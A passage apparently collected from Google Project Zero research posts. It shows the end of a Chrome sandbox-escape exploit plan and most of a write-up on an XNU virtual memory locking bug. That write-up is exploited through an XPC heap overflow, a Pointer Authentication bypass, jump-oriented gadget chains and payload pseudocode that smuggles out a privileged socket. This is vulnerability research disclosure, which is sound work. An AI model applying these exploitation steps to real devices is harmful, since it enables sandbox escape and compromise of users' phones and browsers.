    2. Locate necessary libraries for pivots and ROP chain in the renderer address space
    3. Build a page of data that we’re going to spray in the browser address space containing fake FileSystemOperationRunner, FileSystemContext, FileSystemBackend objects
    4. Trigger the bug
    5. Replace the free’d FileWriterImpl with a fake object that uses the address that we’ll target with our spray as the FileSystemOperationRunner pointer
    6. Spray ~4tb of copies of the page we built in 2c into the browser process address space
    7. Return from the renderer to FileWriterImpl::DoWrite in the browser process, pivoting into our ROP chain and payload
    8. Pop calc
    9. Clean things up so that the browser can continue running
ConclusionsIt’s interesting to have another case where we’ve been able to use weaknesses in ASLR implementations to achieve a working exploit without needing an information leak.
There were two key ASLR weaknesses that enabled reliable exploitation of this bug:
  • No inter-process randomisation on Windows (which is also a limitation on MacOS/iOS) which enabled locating valid code addresses in the target process without an information-leak.
  • No limitations on address-space usage in the Chrome Browser Process, which enabled predicting valid data addresses in the heap-spray.

Without both of these primitives, it would be more difficult to exploit this vulnerability, and would likely have pushed past available motivation (better to keep looking for a better vulnerability, or an additional information leak since the use-after-free wasn’t readily usable as an information leak).
Kategorie: Hacking & Security

Splitting atoms in XNU

1 Duben, 2019 - 22:12
Posted by Ian Beer, Google Project ZeroTL;DRA locking bug in the XNU virtual memory subsystem allowed violation of the preconditions required for the correctness of an optimized virtual memory operation. This was abused to create shared memory where it wasn't expected, allowing the creation of a time-of-check-time-of-use bug where one wouldn't usually exist. This was exploited to cause a heap overflow in XPC, which was used to trigger the execution of a jump-oriented payload which chained together arbitrary function calls in an unsandboxed root process, even in the presence of Apple's implementation of ARM's latest Pointer Authentication Codes (PAC) hardware mitigation. The payload opened a privileged socket and sent the file descriptor back to the sandboxed process, where it was used to trigger a kernel heap overflow only reachable from outside the sandbox.
Exploit for iOS 12.0 on iPhone Xs .Part I: A virtual memory bugWhat's in your space?Most operating systems maintain two data structures representing the virtual address space of processes:
  • A management data-structure, which contains abstract descriptions of what every virtual memory address which is valid in a process should contain

  • A hardware data-structure, typically used by a hardware memory management unit to implement the virtual-to-physical address translations which happen each time memory is read or written

The management data-structures contain book-keeping information like "the 4KB region from address 0x1234000 to 0x1235000 should contain the bytes from the file /tmp/hello starting at offset 0x3000".
The hardware data-structures contain the hardware-specific implementation details of how to translate from virtual address to physical memory address; the hardware will use them at runtime to find the physical addresses which should be used for each memory access.
In XNU the management data structure is a red-black tree of vm_map_entry structures, contained in a struct vm_map. There's generally one vm_map per task. For iOS on modern iPhones the hardware data structures are ARM64 Translation Tables.
One of the major responsibilities of an OS virtual memory subsystem is to keep these data structures in sync; modifications to the high-level representation of virtual memory should be accurately reflected in the hardware data structures when required. The hardware structures are generally created lazily on demand in response to actual memory usage, and the management structures must be the ground truth representation of what a task's virtual address space should contain.
Any bugs in the maintenance of these management structures are likely to have interesting consequences.Copyin'vm_map_copyin_internal in vm_map.c converts a virtual memory region from a task's vm_map into a "copied in" form, constructing a vm_map_copy structure representing the copied virtual memory which can be passed around and subsequently mapped into another task's vm_map (or mapped back into the same vm_map which it came from.)
The function contains a while loop which iterates through each of the vm_map_entry structures making up the virtual memory region to be copied and tries to append a copied form of each vm_map_entry to a vm_map_copy structure.
Under certain circumstances this copy operation can be optimized into a move operation, here's a code snippet with verbatim comments describing one such case:
/*  *  Attempt non-blocking copy-on-write optimizations.  */          if (src_destroy &&       (src_object == VM_OBJECT_NULL ||         (src_object->internal &&          src_object->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC &&          !map_share)        )      )  {    /*     * If we are destroying the source, and the object     * is internal, we can move the object reference     * from the source to the copy.  The copy is     * copy-on-write only if the source is.     * We make another reference to the object, because     * destroying the source entry will deallocate it.     */    vm_object_reference(src_object);        /*     * Copy is always unwired.  vm_map_copy_entry     * set its wired count to zero.     */
   goto CopySuccessful;
This optimization will apply if the source vm_map_entry represents anonymous memory (such as that returned via mach_vm_allocate) and the semantics of the copy operation being performed will cause that memory to be deallocated from the source vm_map. In that case, as the comment describes, the vm_map_entry can be "moved" from the source vm_map into the vm_map_copy structure, rather than a copy-on-write copy being created.
In practise this optimization will be encountered when a mach message is sent containing an out-of-line descriptor with the deallocate flag set. This is a low-overhead way to move large regions of virtual memory between processes, something which can happen with some frequency in XNU.Only mostly atomic...The vm_map_entry's making up the source of the region to be moved will only be removed from the source vm_map after they have all been copied into the vm_map_copy. This happens in the vm_map_delete call, right after the while loop:
 }   // end while(true)      /*   * If the source should be destroyed, do it now, since the   * copy was successful.   */  if (src_destroy) {    (void) vm_map_delete(src_map,                         vm_map_trunc_page(src_addr,                                           VM_MAP_PAGE_MASK(src_map)),                         src_end,                         ((src_map == kernel_map) ?                           VM_MAP_REMOVE_KUNWIRE :                           VM_MAP_NO_FLAGS),                         VM_MAP_NULL);
In order for the move optimization to be correct it is fundamentally important that the copy and removal of the entries is performed atomically; nothing else should be able to mutate the source vm_map while this is happening, as if it could it might also be able to perform an "optimized move" at the same time! In reality, the atomicity is easy to break :(
Above the while loop which iterates through the vm_map_entry's in the source region they take the source vm_map's lock:
 vm_map_lock(src_map);
but looking down the code for calls to vm_map_unlock we find this (again, the comment is verbatim from the source) :
 /*   *  Create a new address map entry to hold the result.   *  Fill in the fields from the appropriate source entries.   *  We must unlock the source map to do this if we need   *  to allocate a map entry.   */  if (new_entry == VM_MAP_ENTRY_NULL) {    version.main_timestamp = src_map->timestamp;    vm_map_unlock(src_map);                new_entry =      vm_map_copy_entry_create(copy,      !copy->cpy_hdr.entries_pageable);                vm_map_lock(src_map);
   if ((version.main_timestamp + 1) != src_map->timestamp) {      if (!vm_map_lookup_entry(src_map,                               src_start,                               &tmp_entry))      {          RETURN(KERN_INVALID_ADDRESS);      }      if (!tmp_entry->is_sub_map)        vm_map_clip_start(src_map, tmp_entry, src_start);      continue; /* restart w/ new tmp_entry */  }
We'll hit this path if the region being copied is comprised of more than one vm_map_entry, since we allocate the first vm_map_entry for new_entry before initially taking the src_map lock.
Quickly dropping a very important lock and retaking it is a common anti-pattern I've observed across the XNU codebase; I'm sure this isn't the only instance of it. In this case this is presumably a hack because vm_map_copy_entry_create may in some cases need to take a vm_map lock.
After reacquiring the src_map lock they perform the following check:
 if ((version.main_timestamp + 1) != src_map->timestamp)
The vm_map timestamp field is a 32-bit value incremented each time the map is unlocked:
 #define vm_map_unlock(map) \    ((map)->timestamp++ , lck_rw_done(&(map)->lock))
This is trying to detect whether another thread acquired and dropped the lock while this thread dropped it then reacquired it. If so, the code checks whether there's still a vm_map_entry covering the current address its trying to copy and then bails out and looks up the entry again.
The problem is that this check isn't sufficient to ensure the atomicity of the optimized copy; just because there's still a vm_map_entry covering this address doesn't mean that while the lock was dropped another thread didn't start its own optimized move operation.
The entries which have previously been appended to the vm_map_copy aren't also invalidated, meaning the atomicity of the optimization can't be guaranteed.
The locking is insufficient to prevent two threads concurrently believing they are performing atomic vm_map_entry move operations on the same vm_map_entry.OverlapTriggering the issue requires us to create two threads, each of which will attempt to perform the move optimization at the same time. If we create a large virtual memory region consisting of alternating anonymous memory entries and memory object entries, we can ensure that copies of the region will require multiple iterations of the vm_map_copy building loop which contains the bad locking primitive. I chose to structure the region as shown in the diagram below, where two out-of-line descriptors consisting of alternating mapping types overlap by one anonymous memory entry. It is this entry to which we want to have the move optimization applied twice, meaning it will appear in two vm_map_copy lists, each believing it has also been atomically removed from the source address space:
         By sending one of these out-of-line descriptors to another process via a mach message, and one to ourselves, we will inadvertently create shared memory! This means that once both processes have received the mach messages the sender's writes to the anonymous page are reflected in the target's address space, something which violates the semantics of mach messages.build-your-own-bug with virtual memory issuesIn 2017 lokihardt found CVE-2017-2456, a similar style of issue involving out-of-line descriptors being backed by shared memory. He found that this could be turned into a heap overflow in libxpc when it parses an XPC dictionary. Specifically, libxpc will call strlen on a buffer in the now-shared memory, use that length plus one to allocate a buffer, then call strcpy to fill the buffer. The strcpy will copy until it finds a NULL byte, unaware of the size of the destination buffer.
By itself such code does not have a bug, because the semantics of mach messages imply that received out-of-line descriptors cannot be modified by the sender. But, if due to a virtual memory bug, the memory is actually shared then this code has a time-of-check-time-of-use "bug."
We'll use this same primitive to build a controlled heap overflow primitive with which we can target any XPC service. I used the custom XPC serialization library I wrote for triple_fetch. For more details check out the exploit. From here on we'll assume we can groom the heap using XPC and cause a heap overflow with non-null bytes during deserialization of an XPC dictionary.Part II: Escaping userspace sandboxes with PACApple's latest A12 system-on-a-chip is the first widely deployed implementation of ARMv8.3's Pointer Authentication Codes feature, commonly referred to as PAC. For a deep-dive into PAC internals check out Brandon Azad's prior work. In this section I'll explore PAC's impact on the exploitation of memory corruption bugs in the context of a userspace sandbox escape. For a more technical overview read section D5.1.5 of the ARM manual.unPACking Pointer Authentication CodesPAC introduces a new set of instructions which treat some of the higher bits of a 64-bit value as an "authentication code" field. There are instructions to add, validate and remove authentication codes, with the intended use case being to add these authentication codes into pointers stored in memory. The idea is that an attacker now has to be able to guess, forge or leak a valid authentication code if they wish to corrupt a pointer and have that pointer used by the target process. Let's take a closer look:
PointersIn iOS userspace pointer authentication codes are 16 bits wide, occupying the bits above the 39-bit userspace virtual address space:

A pointer without an authentication code might look like this:  0x000000019219816c
And that same pointer with an authentication code might look like this:  0x001f32819219816c
(Note that the highlighting there isn't aligned on a 39-bit boundary, the code actually begins at the high bit of the 8.)
The lower 39 bits of the pointer with the authentication code match the same bits in the pointer without the code. The pointer containing the code can't be dereferenced; it's outside the valid address space (unless the code were all zeros.) Instead, ARMv8.3 provides instructions to remove and verify the code. If the verification fails then the hardware will flip a high bit in the resulting pointer, causing it to become invalid. It's only when code attempts to dereference such a pointer that an address translation exception will occur; a PAC code verification failure by itself doesn't cause an exception.
ContextsThe authentication code is derived from three sources: a key, a value to be authenticated (the pointer), and a 64-bit context value. It's this context value which enables many of the more interesting applications of PAC. For example, a pointer's PAC can be created using the address of the pointer itself, meaning that even if a PAC'ed pointer could be disclosed to an attacker, it would only be valid were it reused at the same address. In many cases, however the context value is zero, and PAC provides convenience instructions for specifying a zero context value. KeysThe kernel manages five keys, grouped into three data types (instruction, data and general) and two key families (A and B). In iOS userspace the A-family keys are shared between all processes and the B-family keys are unique per-process. Userspace cannot read or write these keys, they are controlled by EL1 (the kernel) and used implicitly by the PAC instructions.
InstructionsSection C3.1.9 of the ARM manual describes all the new pointer authentication instructions. They fall into four categories:
 PAC* : add an authentication code to a value  AUT* : authenticate a value containing an authentication code  XPAC* : remove an authentication code without validation  COMBINATION : combine one of the above PAC operations with another instruction
Let's look at PACIA. The I and A tell us which key this instruction uses (the A-family Instruction key.) PACIA has two operands:
 PACIA <Xd>, <Xn|SP>
Xd is the register containing the pointer which should have an authentication code added to it. Xn|SP is the register containing the context value which should be used in combination with the A-family instruction key to generate the authentication code, which can be a general-purpose register or the SP register.
There are many variants of the PAC* instructions for using different keys and specific context values, for example:
 PACIZA <Xd> : use zero as the context value for creating an authentication code for register Xd with A-family instruction key
 PACDZB <Xd> : use zero as the context value for creating an authentication code for register Xd with B-family data key
 PACIBSP : add an authentication code to X30 (the link register, containing the return address from a function call) using SP as the context value and the B-family instruction key
There are similar variations for the AUT* instructions, which perform the inverse verification operation to their PAC* counterparts:
 AUTIA <Xd>, <Xn|SP>
Here Xd is the register containing the pointer with an authentication code to be validated. Xn|SP is the register containing the context value; in order for the authentication to succeed the context value passed here must match the value provided when the authentication code was added. This variant will use the A-family instruction key. If the authentication code matches, it is stripped from register Xd such that the register contains the original raw pointer.
If the authentication code doesn't match (because either the pointer value is incorrect, the authentication code is incorrect, the context value is incorrect or the key is different) then the code is still stripped from register Xd but a high bit is then flipped in Xd such that any subsequent dereference of the pointer would cause an address translation exception.
AUTIZA, AUTDZB, AUTIBSP and so on perform the inverse authentication operation to their PAC* counterparts.
The XPAC* instructions remove the PAC bits from a pointer without verifying the code.
The combination instructions provide simple primitives for using PAC to perform one of four common operations:
 B(L)RA* : branch (and link) with authentication
 RETA* : return with authentication
 ERETA* : return across exception level with authentication
 LDRA* : load from address with authentication
These instructions also support using various keys and fixed or particular context values, for example:
 RETAB: use SP (the stack pointer) as the context value to authenticate LR (the link register) using the B-family instruction key and if authentication is successful continue execution at the authenticated LR value, but don't write the authenticated value back to LR.
 BLRAAZ <Xn> : use zero as the context value to authenticate the contents of register Xn using the A-family instruction key. If authentication is successful, continue execution at the authenticated Xn address and store PC+4 into LR (the link register) but don't write the authenticated value of Xn back.PAC primitivesIn iOS 12 on A12 devices there is some compiler support to use some of the new PAC instructions to build new security primitives.
For example: as a mitigation against return-oriented-programming (ROP) function prologues and epilogues have changed from looking like this:
 SUB      SP, SP, #0x20  STP      FP, LR, [SP,#0x10]  ADD      FP, SP, #0x10  ...  LDP      FP, LR, [SP,#0x10]  ADD      SP, SP, #0x20 ; ' '  RET
to looking like this:
 PACIBSP  SUB      SP, SP, #0x20  STP      FP, LR, [SP,#0x10]  ADD      FP, SP, #0x10  ...  LDP      FP, LR, [SP,#0x10]  ADD      SP, SP, #0x20 ; ' '  RETAB
PACIBSP uses the value of SP at the function entry point as the context value to add an authentication code using the B-family instruction key to LR (the link register, containing the return address.) LR is then spilled to the stack. At the end of the function, when SP should be equal to its value when the function was entered, RETAB uses SP as the context value again to verify LR's authentication code after loading it from the stack. If LR's code is valid, then execution continues at that address.
What does this mean in practice? Since the B-family keys are unique per-process on iOS it means that from another process we cannot forge a fake return address which would pass the authentication check in RETAB by running the PACIBSP instruction ourselves. In addition, the use of SP as the context value means that even if we had the ability to disclose stack memory we would only be able to reuse authenticated pointers when the value of SP matches. It's important to observe here that this just breaks a particular technique commonly seen in public exploits; whether use of that technique is a necessary part of exploitation is another question.
In general, almost all function pointers are now somehow making use of PAC: weakly protected pointers use an A-family key and a zero context value, while strongly protected pointers use a B-family key with a non-zero context derived from some runtime value.Necessary compromises...The per-process B-family keys are only used in a handful of situations. The more common use of A-family shared keys is a necessary compromise. Consider the pages of memory containing C++ vtables in shared libraries. These pages are copy-on-write shared between processes. If each pointer in each vtable contained an B-family authentication code, then these pages could no longer be copy-on-write shared between all processes, as each process would have unique vtables. This would introduce an extreme memory and performance overhead as much of the shared cache would have to be copied and "reauthenticated" each time a new process were created.
The use of the B-family keys for ROP mitigation is possible because a stack frame is never shared between processes (unless you're doing something really weird...). For other possible uses of PAC it's much harder to assert that a particular pointer will never escape the confines of a particular process, even in a COW way.Exploiting memory corruption in the presence of PACThe attack scenario is important to consider when discussing exploitation and mitigations. The exploit I describe here assumes the attacker already has native code execution of some sort. Although the proof-of-concept exploit provided is a "malicious app", that is only one possible scenario. Similar primitives to those used by this exploit could also be implemented from a Safari WebContext exploit able to write shellcode to JIT memory, or even with only an arbitrary read/write primitive and an A-family PAC signing oracle.
(There is some usage of PAC in JavaScriptCore on A12 to try to provide some integrity while native code is being emitted; bypassing this is left as an exercise for the reader ;) )
Given these attack scenarios, we can assume that an attacker is able to forge PAC codes which use A-family keys. Since these keys are shared between all processes, if we execute an instruction like PACIA in our attacker process, the resulting PAC code will also be valid for identical inputs in another process.
New Mitigations; New PrimitivesUsing the atomicity bug, we've built a heap corruption primitive targeting libxpc which we can trigger by sending an XPC dictionary to a target.
In my triple_fetch exploit from 2017, which also targeted a bug in libxpc, I corrupted an objective-C object's isa pointer. From there you get control of the selector cache and from there complete control of PC when a selector is called.
On A12 devices, the objective-C selector cache now uses the B-family instruction key to authenticate entries in the selector cache:
_objc_msgSend:...  LDP   X17, X9, [X12] ; X12 points into selector cache                       ; X17 := fptr ; X9  := selector ptr  CMP   X9, X1         ; does the cached selector ptr match?  B.NE  no_match       ; no? try next one if more entries, otherwise:  EOR   X12, X12, X1   ; XOR the selector pointer into the context ;)  BRAB  X17, X12       ; yes? Branch With Authentication                       ;      using B-family Instruction key                       ;      and selector cache entry address                       ;      as context
(The selector XOR is a recent addition to prevent an authenticated function pointer being reused for a different selector but in the same cache slot)
Without the ability to forge or disclose B-family authenticated pointers we can't simply point to a fake selector cache. This breaks the fake selector cache technique.
The trick I'm using here is that while the selector cache entries are "tied" to a particular cache by PAC, the isa pointers (which point to the objective-C class object) are not tied to particular objects. An objective-C object still has a "raw" isa class pointer as its first 8 bytes. This means we can still use a memory corruption primitive to replace an object's isa pointer with another type's isa pointer, allowing us to create a type confusion. We then just need to find a suitable replacement type such that an A-family authenticated function pointer will be read from it and called, as opposed to a fake selector cache. Since we can forge A-family authenticated pointers this will give us initial PC control.
As a place to start I began looking through the various implementations of XPC object destruction in libxpc. These are the methods with names like __xpc_TYPE_dispose, called when xpc objects are freed.
For example, here's a snippet from __xpc_pipe_deserialize:
 PACIBSP  STP      X20, X19, [SP,#-0x10+var_10]!  STP      X29, X30, [SP,#0x10+var_s0]  ADD      X29, SP, #0x10  MOV      X19, X0  LDR      W0, [X19,#0x24] ; name  CBZ      W0, loc_180AFFED0  BL       __xpc_mach_port_release
We could use the isa overwrite technique to craft a fake xpc_pipe object such that this method would be called and we could cause an arbitrary mach port name to be passed to mach_port_deallocate. You could then use techniques such as that which I used in mach_portal, or Brandon Azad used in blanket to impersonate an arbitrary mach service.
Note that for that we wouldn't need to forge any PAC authenticated pointers.
Instead we're deliberately going to get PC control, so we need to read more methods. Here's the start of __xpc_file_transfer_dispose:
 PACIBSP  STP      X20, X19, [SP,#-0x10+var_10]!  STP      X29, X30, [SP,#0x10+var_s0]  ADD      X29, SP, #0x10  MOV      X19, X0  LDR      W8, [X19,#0x58]  CMP      W8, #1  B.EQ     loc_180B06CDC  LDR      X0, [X19,#0x40] ; aBlock  CBZ      X0, loc_180B06C70  BL       __Block_release_0

If the qword at X0+0x40 is non-zero it will be passed to _Block_release, which is part of the open-source libclosure package:
void _Block_release(const void *arg) {  struct Block_layout *aBlock = (struct Block_layout *)arg;  if (!aBlock) return;  if (aBlock->flags & BLOCK_IS_GLOBAL) return;  if (! (aBlock->flags & BLOCK_NEEDS_FREE)) return;
 if (latching_decr_int_should_deallocate(&aBlock->flags)) {    _Block_call_dispose_helper(aBlock);    _Block_destructInstance(aBlock);    free(aBlock);  }}
Here we can see the argument is actually a Block_layout structure. The code checks some flags, then decrements a reference count. If it decides that the object should be freed it calls _Block_call_dispose_helper:
static void _Block_call_dispose_helper(struct Block_layout *aBlock){  struct Block_descriptor_2 *desc = _Block_descriptor_2(aBlock);  if (!desc) return;
 (*desc->dispose)(aBlock);}
This clearly calls a function pointer from the block structure. Let's look at this in assembly, here from 12.0:
 LDR     X8, [X19,#0x18] ; read the Block_descriptor_2 pointer from                          ;   +0x18 in the block  LDR     X9, [X8,#0x18]! ; bump that pointer up by 0x18 and load the                          ;   value there into x8  AUTIA   X9, X8          ; authenticate X9 using A-family instruction                          ;   key and X8 (the address the pointer was                          ;   read from) as context  PACIZA  X9              ; add a new PAC code to the function pointer                          ;   using A-family instruction key and a                          ;   zero context  MOV     X0, X19         ; pass the block as the first argument  BLRAAZ  X9              ; branch with link register and authenticate                          ;   using A-family instruction key and                          ;   zero context
(this code has changed slightly in later versions but the functionality we're using remains the same)
This gives us a path from corrupting an objective-C object pointer to PC control which doesn't involve any B-family keys. A prerequisite is that we can place known data at a known location, since we will need to forge the context value here:
 AUTIA   X9, X8
which is the address from which X9 was read. For this I'm using the same mach_msg OOL_DESCRIPTOR spray technique which continues to work on iOS 12. Note that the memory overhead for this is very low, as we are actually just sending multiple copies of the same anonymous region for the spray.
Putting those steps together, our strategy looks like this:
Build an XPC dictionary (inside a region of memory which we can target with the non-atomic copy when we send it) which grooms the heap such that we can land the bad strcpy buffer right before an xpc array backing buffer. Trigger the non-atomic move bug such that we can continue to write to the serialized XPC dictionary while the target process is deserializing it, and use that to cause the bad strcpy, overflowing into the first pointer in the xpc array backing buffer.
Point that to a crafted XPC object contained in the OOL_DESCRIPTOR heap spray which has an xpc_file_transfer isa pointer as its first member. When the xpc array is destroyed __xpc_file_transfer_dispose will be called which will follow a controlled pointer chain to call an A-family authenticated function pointer.
This diagram shows the layout in the attacker's address space of the XPC dictionary inside the non-atomic region:

The XPC dictionary contains duplicate keys which it uses as a primitive for grooming the heap and making holes. It attempts to groom a layout similar to this:

If everything goes to plan by flipping the flipper byte in the sender process we can race the strlen;malloc;strcpy in the XPC deserialization code such that the target first sees a short string (the length of the undersized strcpy dest buffer, which malloc should slot right before the target xpc_array backing buffer if the groom worked) then the null byte is replaced by a non-null byte when read by strcpy meaning the copy will proceed off the end of the undersized strcpy dest buffer and corrupt the first entry in the xpc_array's backing buffer, which is an array of pointers (or tagged pointers) to xpc objects.
We corrupt the first pointer to instead point to a fake xpc_file_transfer object in the heapspray which we try to place at 0x120200120:

When the xpc_array containing the now-corrupted pointer is released it will release each of the entries in the array, causing the fake OS_xpc_file_transfer isa to be read leading to 0x120200120 being passed as the first (self) argument to __xpc_file_transfer_dispose. This code reads the fake block pointer at 0x120200160, then reads the fake descriptor pointer at 0x1202000018 and finally performs a PAC authentication on the pointer read from 0x120200098 using the A-family instruction key and the address of the pointer as the context.
The exploit uses a small assembly stub to allow us to forge a valid pointer here:
 .globl  _pacia  .align  2  _pacia:    pacia x0, x1    ret
Filling our heapspray memory with a repeated page containing such a structure we can gain PC control :)goto 10Previously I might have looked to point the initial PC value to a stack pivot, allowing the chaining together of ROP gadgets by popping fake stack frames. The issue now, as we saw earlier, is that even if we gain control of the stack pointer the spilled LR values (return addresses) are authenticated with the B-family instruction key and the stack pointer as context. This means we can't forge them from our attacking process.
Again, as with the selector cache, this is just a mitigation against a particular technique, not something which is fundamentally required for exploitation.
The end goal here is to be able to move from controlling PC once to controlling it repeatedly, ideally with arbitrary, controlled values in a few argument registers so we can chain arbitrary function calls. Really nice to have would be the ability to pass return values from one arbitrary function call as an argument to a later one.
Techniques which achieve functionality like this are sometimes referred to as JOP (Jump-Oriented-Programming) which is now used as a catch-all term for all techniques which chain together multiple PC controls without using the stack. All the gadgets I use here were found manually just with a few regexs in IDA Pro.
The first type of gadget I wanted was something which would call a function pointer in a loop, with some change in arguments each time. Since libxpc was already loaded into IDA, that's where I started looking. Here's a screenshot from IDA of _xpc_array_apply_f (it's easier to see the loop structure in the graph view:)

This looks like a good loop primitive. The intended functionality here is to pass each element of an xpc_array to the function pointer supplied in X2. If we can reach here with a controlled value in X0 (a fake xpc_array) and X2 (function pointer), we can get the function pointer called in a loop with a different, controlled value in X1 each time. Specifically it's going to read a length value from the fake xpc_array+0x18 then call the function pointer repeatedly passing each element from the fake xpc_array backing buffer pointed to by X0+0x20 as X1 each time.Gadget CollectionWe need a few gadgets either side of this loop primitive. When we first get PC control X19 points to the base of the heap spray. We need to get from there to control of PC, X0 and X2 in order to use the loop gadget.
This instruction sequence inside libc++ gets us from X19 to X0, X1 and PC again:
18004816C:  LDP    X0, X1, [X19,#0x48]   ; load X0 from [X19+0x48] and                               ;      X1 from [X19+0x50]  LDR    X8, [X0]              ; X0 is supposed to be a C++ object                               ; pointer, so read the vtable pointer  LDRAA  X9, [X8,#0x28]!       ; authenticate X8 (the vtable pointer)                               ; with a zero context value and                               ; A-family data key. Add 0x28 to the                               ; authenticated vtable pointer and read                               ; the function pointer there into X9                               ; then write the target address back                               ; into X8 (so X8 points to the function                               ; pointer in the vtable)  MOVK   X8, #0xD96D,LSL#48    ; load the high 16-bits of X8 with a                               ; constant representing a type-tag for                               ; the inheritance hierarchy expected                               ; at this callsite  ADD    X2, SP, #0x50+var_40  ADD    X4, SP, #0x50+var_48  MOV    X3, X20  BLRAA  X9, X8                ; branch and link with authentication                               ; using A-family instruction key and X8                               ; (address of vtable function pointer                               ; | (type_tag << 48)
To use that we need to forge two uses of PAC A-family keys, which we can do. Note that each of these gadgets end by calling function pointers read from memory which we control. This is how we are able to link them together.
To reach our loop primitive we need to control X2 as well as X0, which we can get by chaining this sequence next:
18082B660:  MOV     X22, X1  MOV     X19, X0  STR     X22, [SP,#0x50+var_48]  MOV     W24, #0x16  CBZ     X19, loc_18082BB3C  CBZ     X22, loc_18082BB3C  LDR     X8, [X19,#0x18]  CBZ     X8, loc_18082B698  LDR     X2, [X19,#0xC8]  ADD     X1, SP, #0x50+var_48  MOV     X0, X22  BLRAAZ  X8
This also calls through a function pointer which uses PAC, but still an A-family key (with a zero context) which we can easily forge.
By pointing the fake xpc_array object into the heap spray we can now repeatedly get the same function pointer called with a different value in X1 each time. We now want to find a gadget which lets us turn that into a more controlled arbitrary function call primitive. Again we can reused some intended functionality.
I stumbled across IODispatchCalloutFromCFMessage a while ago while reading IOKit code; it's used under the hood to power asynchronous notification callbacks in IOKit. The userspace process receives messages on a mach port receive right it owns, and from the message reads a function pointer and arguments then calls the function pointer with those arguments. I had filed it away as a potential exploitation technique for a mach port name management bug, but it also provides a nice primitive for this exploit.
The method signature is this:
voidIODispatchCalloutFromCFMessage(CFMachPortRef port __unused,                               void *_msg,                               CFIndex size __unused,                               void *info __unused)
Note that all arguments apart from _msg are unused, so only X1 control is required to use this method. The function pointer to call (authenticated with the A-family instruction key and zero context) and the parameter are read from the _msg pointer. There are some constraints: you can only pass four arguments, and the second one can only be 32-bits, but this is enough to start with.
If we set IODispatchCalloutFromCFMessage as the function pointer argument to _xpc_array_apply and make each element of the fake xpc_array be a pointer to a fake mach message matching the format expected by IODispatchCalloutFromCFMessage then we can chain together an arbitrary number of basic function calls.
There are a few more gadget primitives which make writing a full payload easier:
retcaptureThe prototype of IODispatchCalloutFromCFMessage says its return type is void, and reading the assembly we can see that actually the return value (X0) from the function pointer it calls will survive in X0 through to the end of IODispatchCalloutFromCFMessage, meaning in practice IODispatchCalloutFromCFMessage returns the values returned by the called function pointer. This means we can wrap IODispatchCalloutFromCFMessage in another gadget which calls a controlled function with a controlled value in X1 and then writes that return value to a memory address we control.
A bit of searching finds this inside libsystem_trace:
 PACIBSP  STP      X20, X19, [SP,#-0x10+var_10]!  STP      X29, X30, [SP,#0x10+var_s0]  ADD      X29, SP, #0x10  MOV      X19, X0  LDP      X8, X1, [X19,#0x28]  LDR      X0, [X8,#0x18]  MOV      X8, X0  LDR      X9, [X8,#0x10]!  BLRAA    X9, X8  LDR      X8, [X19,#0x20]  LDR      X8, [X8,#8]  STR      X0, [X8,#0x18]  LDP      X29, X30, [SP,#0x10+var_s0]  LDP      X20, X19, [SP+0x10+var_10],#0x20  RETAB
This method takes a single argument from which, through a series of dereferences, it reads a function pointer to call as well as the X1 argument to pass. It calls the function pointer then writes the return value from the call into an address read from the input argument.
If we use the initial arbitrary call gadget to call this, passing the required descriptor in X1, we can use this to call the arbitrary call gadget again, but now the return value from that inner call will be written to a controlled memory address.
By carefully choosing that memory address to overlap with the argument descriptors for later calls we can pass the return value from one arbitrary call as an argument to a later call.
memory_copy  LDR    X9, [X0]  STR    X9, [X3]  B      endend:  MOV    X0, X8  RET
This gadget can be called using the arbitrary call gadget to read a 64-bit value from a controlled address and write it to another controlled address.
indirect_add  LDR    X8, [X0, #0x18]  ADD    X8, X8, X1  STR    X8, [X3]  MOV    W0, #0x0  RET
This gadget can also be called using the arbitrary call gadget and can be used to add an arbitrary value to a value read from a controlled memory address, and write that sum back to memory.
The exploit contains various macros which seek to aid combining these primitives into useful payloads. It might seem like this is quite a limited set of primitives, so let's demonstrate a practical use by building a payload to open a PF_KEY socket in the target process and smuggle it back to ourselves so we can trigger CVE-2019-6213, a kernel heap overflow not reachable from inside the app sandbox.Stealing sock(et)sUnix domain sockets are the canonical way to send file descriptors between processes on UNIX OSs. This is possible on iOS, indeed see P0 issue 1123 for a bug involving them. But we have an alternative:  XNU has the concept of a file_port, a mach port which wraps a file descriptor. We can use this to easily send a socket file descriptor from the remote task back to ourselves.remote space introspectionIn earlier exploits like triple_fetch I sprayed mach port send rights into the target then guessed their names in order to send mach messages back to the attacking process. Apple have since introduced some randomization into mach port names. The generation number now wraps randomly at either 16, 32, 48 or 64. This makes guessing remote mach port names less reliable.
Given that we can chain together arbitrary function calls, what if we just remotely enumerate the mach port namespace in the target and find the name of a sprayed mach port send right in a more deterministic way?
Here's the prototype for mach_port_space_info:
kern_return_t mach_port_space_info(  ipc_space_inspect_t task,  ipc_info_space_t *space_info,  ipc_info_name_array_t *table_info,  mach_msg_type_number_t *table_infoCnt,  ipc_info_tree_name_array_t *tree_info,  mach_msg_type_number_t *tree_infoCnt);
For the given task port this method will return a descriptor for each mach port name in that task's mach port namespace, containing the port's name, the rights the task has and so on.
It might seem at first glance like this method would be hard to call given the limitations of our loop-call gadget (only 4 arguments, and the second only 32-bit.) The insight here is that this function is just a MIG generated serialization function. The functionality is really reached by sending a mach message to the task port, something which can be achieved by calling mach_msg_send which only requires control of one argument.
By sending a mach message to the task_self port with a msgh_id value of 3223 and a valid reply port then receiving the reply via mach_msg_receive we can get an out-of-line descriptor containing all the task's mach port names. We can use the indirect add and memory copy gadgets to read a sprayed mach port name from the mach_port_space_info reply message and send a message containing a file_port containing the PF_KEY socket to it.
The heap spray also contains two skeleton mach messages which the payload uses, one for mach_port_space_info and one for sending the file_port back to the attacker. Here's a pseudo-code implementation of the entire payload functionality; take a look at the real payload in unPACker.c to see this pseudocode translated into the JOP macros.
// make sure the mach_port_space_info has// the right name for the task port*task_port = ret_wrapper(task_self_trap())
// get the thread's mig reply port*reply_port = ret_wrapper(mig_get_reply_port())
// write those two values into the correct placesmemory_move(mach_port_space_info_msg.remote_port, task_port)memory_move(mach_port_space_info_msg.local_port, reply_port)
// send the mach_port_space_info requestmach_msg_send(mach_port_space_info_msg)
// fill in the reply port name in the reply messagememory_move(port_space_reply.local_port, reply_port)
// receive a replymach_msg_receive(port_space_reply)
// the port space is guaranteed to be at least as large// as the number of ports we sent, so add that number*4*7// to the received OOL desc pointer add_indirect(port_space_reply.ool.address, 4*7*0x1000)
// now we can be pretty sure that this port name is// a send right back to the attackermemory_move(exfil_msg.remote_port, port_space_reply.ool.address)
